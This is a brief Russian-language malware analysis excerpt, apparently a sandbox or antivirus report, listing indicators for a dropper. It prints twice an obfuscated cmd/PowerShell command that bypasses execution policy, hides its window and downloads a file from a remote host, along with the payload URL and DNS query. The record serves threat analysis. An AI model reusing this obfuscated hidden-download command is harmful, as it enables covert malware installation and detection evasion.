Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwE^rsHEl^L^.eX^e^ -eX^E^cutiOnPolI^CY^ BYpAS^S^ -^n^OPrO^fi^L^E ^-w^iNDow^S^TY^L^e^ hiDD^E^n (^N^ew^-ObJecT ^sySTem.nE^T.^WEBCLI^e^NT)^.dOWnl^o^ad^File^(^'http://www.doorasope.top/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "pOwE^rsHEl^L^.eX^e^ -eX^E^cutiOnPolI^CY^ BYpAS^S^ -^n^OPrO^fi^L^E ^-w^iNDow^S^TY^L^e^ hiDD^E^n (^N^ew^-ObJecT ^sySTem.nE^T.^WEBCLI^e^NT)^.dOWnl^o^ad^File^(^'http://www.doorasope.top/...' (со скрытым окном)